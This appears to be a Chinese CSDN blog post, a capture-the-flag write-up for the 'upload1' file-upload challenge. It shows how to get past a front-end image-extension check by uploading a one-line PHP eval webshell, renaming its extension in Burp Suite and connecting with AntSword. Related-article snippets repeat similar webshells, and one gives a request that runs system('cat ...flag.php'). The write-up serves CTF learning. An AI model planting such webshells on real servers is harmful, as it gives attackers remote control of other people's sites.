攻防世界：upload1

最新推荐文章于 2024-06-11 21:29:11 发布

bjml

最新推荐文章于 2024-06-11 21:29:11 发布

阅读量778

点赞数 1

分类专栏：攻防世界文章标签：安全 web安全

本文链接：https://blog.csdn.net/bjml_/article/details/134224012

版权

攻防世界专栏收录该内容

5 篇文章 0 订阅

订阅专栏

看了场景后，发现是需要上传一个文件，随意上传一个文件后，提示需要上传一个图片文件。

这种情况一般是一句话木马，因为写一句话木马的文件是php，所以上传后需要burpsuite修改包后缀名为jpg，最后用场景网站文件位置利用中国蚁剑连接。

首先构造我们的一句话木马：

<?php
@eval($_POST['attack']);
?>

将文件格式改成jpg，然后上传。

上传后，打开burpsuite。

将图中jpg改为php

最后forward。

接下来看见upload success : upload/1699281482.一句话木马.php后，打开中国蚁剑，添加数据。

如图所示。

最后双击web段，就可以在文档中找到flag。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

bjml

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
攻防世界：upload1

攻防世界：upload1
复制链接

扫一扫

专栏目录

【网络安全 | CTF】攻防世界 upload1 解题详析

等风来

05-24

4575

该代码通过扩展 Array 原型对象添加了一个名为 contains 的函数，用于判断一个对象是否在数组中，主要应用于判断上传文件的扩展名是否属于指定的图片格式，这里是 [‘jpg’,‘png’]这段代码的作用是检查上传文件的扩展名是否符合要求，如果是图片格式（jpg或png），则启用提交按钮，否则禁用提交按钮并弹出提示消息。若文件上传成功，则在上传路径对应的页面会输出。考察文件上传，具体原理及姿势不再赘述。抓包，修改filename文件后缀为。无Error回显，说明木马上传成功。

攻防世界：web Bug

Zeker62的博客

09-10

1151

目录靶场分析登录admin伪造IP总结靶场分析这道题涉及到解密我是没有想到的拿到手，是一个登录界面：拿扫描器扫描，发现没有其他的文件分析可能存在的漏洞： SQL注入漏洞 SQL二次注入漏洞其他逻辑漏洞经过尝试，前两个漏洞都没有，只有可能是最后一个漏洞了登录admin 我们登录一个账户进去，点击manager，发现弹窗提示：猜想管理员的账号是admin，回到注册界面，注册一个a...

参与评论您还未登录，请先登录后发表或查看评论

攻防世界-upload

qq_44065556的博客

09-24

1175

进入场景映入眼帘需要注册账号注册好之后,登录跳转页面突破点应该就在这里了我们先上传一个php文件显示不正确的文件扩展名,被拦了用burp抓包改信息成功上传但是没有上传路径只能上传不能利用思考(题目给的是upload,给的引导思路就是上传文件拿flag) 我试着上传jpg,png格式的图片文件有文件名回显,这说明文件已经被传到了数据库中,游览器又从数据库中读取了上传的文件,那么这个过程久有可能触发sql注入 ...

攻防世界CTF题：upload1

Aixwei的博客

04-11

1037

发现这里有个onchange事件，大概写了个前端的文件check，那我们在前端把它删掉再上传文件试试。发现了 disabled属性，我们把它删掉之后上传按键可以点击了，此时点击上传，可以看到上传成功。细看当前页面，发现上传按钮灰掉了，但是上传的文件还保留在前端并没有删除，此时再查看前端代码，最后，通过上传图片类型的木马，再通过bp抓包修改后缀绕过前端验证也是可以的成功。发现这里弹窗提示你要上传图片，可能是前端验证文件格式，所以先看一下源代码，我们先正常上传一句话木马，被拦截后点击确定，

攻防世界Web新手题 upload1

最新发布

qq_52481261的博客

06-11

667

对于木马首先则是需要学会使用一句话木马，木马最根本的作用就是控制网站，不同的命令会导致测试链接的密码不一致又或者有的命令在上传后会有回显，以下是两句木马均可用于制作上传，不过一个测试密码为123，一个测试密码为attack。上传木马后对网站进行抓包，并将图片后缀名修改为php，点击forward提交，返回页面查看上传文件若显示为php则修改成功。遇到文件上传问题我们应该想到上传木马并渗透控制网站，在网站根目录中找到我们想要的信息。输入文件上传后的网址以及木马中的提交密码进行连接。空白界面右键点击添加数据。

攻防世界之upload1

金帛的博客

04-24

2357

攻防世界之文件上传

攻防世界-upload1

m0_49025459的博客

12-29

299

访问题目场景查看一下网页源代码。

攻防世界upload1（web）

yuanxu8877的博客

11-22

1124

攻防世界web-upload1

【攻防世界】十三 --- upload1 --- 文件上传

qq_43168364的博客

12-25

391

题目 — upload1 一、writeup 这里上传了纯纯的一句话木马文件，快速的回显出了，弹窗可以判断使用的是前端检测手段，将getshell.php改名为getshell.jpg上传，用bp抓包上传成功对应的目录用蚁剑链接即可得到flag 二、知识点文件上传 ......

攻防世界的里的upload1

一大口木的博客

05-23

601

点击后的页面看一下我的一句话木马。

攻防世界upload1

weixin_52268949的博客

01-30

1012

upload1 进入环境就一个上传，我们先上传一个普通的木马文件看看木马内容 <?php @eval($_POST["cmd"]); ?> 估计是前端校验我们查看源码只能上传jpg和png图片，那我们将木马后缀改为.jpg然后使用bp抓包并把后缀改为.php即可然后访问木马文件执行指令即可执行后查看源码便发现flag ...

攻防世界-web-upload1

wuh2333的博客

05-21

312

攻防世界，upload1

CTF-WEB篇攻防世界题目实战解析upload1

2301_76565920的博客

04-22

1188

题目：upload 知识点：一句话木马，webshell，burpsuite拦截并修改数据包

攻防世界web--【upload1】

weixin_53146913的博客

04-18

2992

对于上传文件的识别验证分为，前端和后端。本题是标准的前端验证，所以我们可以通过bp抓包来实现php文件上传，也可以通过只修改前端的js代码进行欺骗。虽然二者都很简单，但是第一次做前端验证的题还是想记录一下。 Let's go! 首先上传一个一句马。之后找到这个上传控制属性：是这个"disabled" 咱们就是直接给他删掉的一个大动作，我们发现这个alert弹窗消失了，然后我们的上传按键又复活了！！我们就点击“上传”。然后我们访问这个文件的网址。 ..

【愚公系列】2023年05月攻防世界-Web（upload1）

热门推荐

时光隧道

01-25

3万+

文件上传漏洞是指攻击者通过上传含有恶意代码的文件，导致服务器被攻击的一种漏洞。当攻击者上传的文件没有经过检测或检查时，恶意代码便会被执行。在上传文件时，由于没有正确地验证上传文件的类型、大小和路径等相关信息，攻击者通过上传恶意代码的方式，可以控制并篡改Web应用程序，进而访问敏感信息。Webshell就是指攻击者在Web服务器上上传的恶意代码，一旦上传成功，则攻击者可以通过Web页面的方式，执行服务器上的各种操作，包括修改、删除、添加等。由于Webshell的具有隐藏性和隐蔽性，因此很难被发现和清除。

【攻防世界】十一、upload1

Hi~ 土拨鼠

09-15

507

步骤打开所给场景，发现可以上传文件，尝试进行上传一句话木马： <?php @eval($_REQUEST['a']); echo "执行成功"; ?> 发现提示只能上传图片，点击确定后发现文件已经选中，但是提交按钮却不能点击：一看就是通过前端js脚本进行校验了，这样就很简单了，两种方法：第一种：简单粗暴，直接进入控制台，点击设置，禁用JavaScript 刷新，重新选中一句话木马，发现可以提交上传成功，发现上传的路径已经显示，进行访问在这里卡了好久，我一直尝试进行传入参数.

ctf upload1

07-28

根据提供的引用内容，可以得知ctf upload1是一个CTF比赛中的一个上传功能。通过上传文件，可以执行一句话木马来获取flag。具体步骤如下： 1. 首先，需要找到一句话木马的代码。根据引用\[1\]中的内容，可以得到一句话木马的代码为`<?php @eval($_GET\['attack'\]); ?>`。 2. 接下来，需要构造一个GET请求，将一句话木马的代码作为参数传递给服务器。根据引用\[2\]中的内容，可以得到请求的URL为`http://111.200.241.244:54118/upload/1637599461.2.php?attack=system('cat /var/www/html/flag.php');`。这个请求会执行`system('cat /var/www/html/flag.php')`命令，将flag.php文件的内容返回。 3. 最后，发送该请求，即可获取flag。请注意，这个请求需要在合适的环境下进行，且仅供学习和研究使用。总结起来，ctf upload1是一个上传功能，通过上传文件执行一句话木马来获取flag。具体步骤是构造一个GET请求，将一句话木马的代码作为参数传递给服务器，然后执行相应的命令获取flag。 #### 引用[.reference_title] - *1* *2* *3* [XCTF-攻防世界CTF平台-Web类——11、upload1（文件上传、前端校验）](https://blog.csdn.net/Onlyone_1314/article/details/121503130)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]